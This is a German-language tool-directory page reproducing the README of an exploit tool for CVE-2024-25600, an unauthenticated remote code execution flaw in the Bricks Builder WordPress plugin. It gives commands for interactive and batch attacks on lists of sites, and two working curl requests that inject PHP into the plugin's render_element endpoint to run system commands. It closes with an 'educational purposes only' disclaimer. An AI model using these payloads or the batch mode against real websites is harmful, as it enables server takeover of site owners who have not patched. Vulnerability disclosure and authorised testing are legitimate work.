Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-25600-Bricks-Builder-plugin-for-WordPress — Dieses Tool wurde entwickelt, um die Schwachstelle CVE-2024-25600 auszunutzen, die im Bricks Builder Plugin für WordPress gefunden wurde. Die Schwachstelle ermöglicht eine nicht authentifizierte Remote-Codeausführung auf betroffenen Websites. Das Tool automatisiert den Exploit-Prozess, indem es Nonces abruft und speziell gestaltete Anfragen sendet, um beliebige Befehle auszuführen. | Kitploit
Tools/GitHubGitHub/tornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubtornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress

CVE-2024-25600-Bricks-Builder-plugin-for-WordPress

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Repository anzeigen
9vor 2 JahrenNoch nicht geprüft

Dieses Tool wurde entwickelt, um die Schwachstelle CVE-2024-25600 auszunutzen, die im Bricks Builder Plugin für WordPress gefunden wurde. Die Schwachstelle ermöglicht eine nicht authentifizierte Remote-Codeausführung auf betroffenen Websites. Das Tool automatisiert den Exploit-Prozess, indem es Nonces abruft und speziell gestaltete Anfragen sendet, um beliebige Befehle auszuführen.

Teilen

CVE-2024-25600 Exploit-Tool 🚀

Beschreibung 📝

Dieses Tool 🛠️ wurde entwickelt, um die Sicherheitslücke CVE-2024-25600 🕳️ auszunutzen, die im Bricks Builder Plugin für WordPress gefunden wurde. Die Schwachstelle ermöglicht eine nicht authentifizierte Remote-Code-Ausführung auf betroffenen Websites 💻. Das Tool automatisiert den Ausnutzungsprozess, indem es Nonces abruft und speziell gestaltete Anfragen sendet, um beliebige Befehle auszuführen.

Funktionen 🌟

  • Interaktiver Modus: In Echtzeit mit der Zielwebsite interagieren 🕹️.
  • Batch-Modus: Mehrere Websites aus einer Liste scannen und angreifen 📋.
  • Befehlsausführung: Beliebige Befehle auf dem Zielserver ausführen ⚙️.

Installation 🛠️

  1. Klonen Sie dieses Repository auf Ihren lokalen Rechner 🖥️ mit git clone.
  2. Navigieren Sie in das Verzeichnis des geklonten Repositorys.
  3. Installieren Sie die erforderlichen Python-Bibliotheken mit pip install -r requirements.txt.

Verwendung 📖

Interaktiver Modus 🎮

  1. Starten Sie das Tool mit python exploit.py -u <URL>, um den interaktiven Modus zu öffnen.
  2. Folgen Sie den Bildschirmanweisungen, um Befehle an den Zielserver zu senden.

Batch-Modus 📊

  1. Erstellen Sie eine Textdatei mit einer Liste der Ziel-URLs.
  2. Führen Sie das Tool mit python exploit.py -l <file_path> aus, um die aufgeführten Websites zu scannen und anzugreifen.

Proof of Concept (PoC) 📝

Der grundlegende PoC aus der Offenlegung lautet wie folgt:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Aktualisierung: Zweiter PoC (zuverlässiger)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Es ist möglich, dass zusätzliche Payloads bessere Ergebnisse liefern. Sollte mein Exploit oder Proof of Concept bei Ihnen nicht funktionieren, empfehle ich Ihnen, mit alternativen Payloads zu experimentieren, um eine effektivere Lösung zu finden.

Ersetzen Sie [HOST] durch die Zielwebsite und [NONCE] durch den von der Website abgerufenen Nonce-Wert.

Referenz 📖

Weitere Informationen zur Sicherheitslücke CVE-2024-25600 finden Sie in der ausführlichen Offenlegung unter Snicco.io.

Haftungsausschluss ⚠️

Die in dieser README bereitgestellten Informationen dienen ausschließlich zu Bildungszwecken. Unbefugtes Hacken von Websites oder Netzwerken ist illegal und unethisch. 🚫

Danksagungen 🙏

Dank an die Sicherheitsforscher, die diese Schwachstelle entdeckt und gemeldet haben und der Community Informationen und Tools zur Verfügung stellen, um ihre Webanwendungen zu schützen.

Tool herunterladen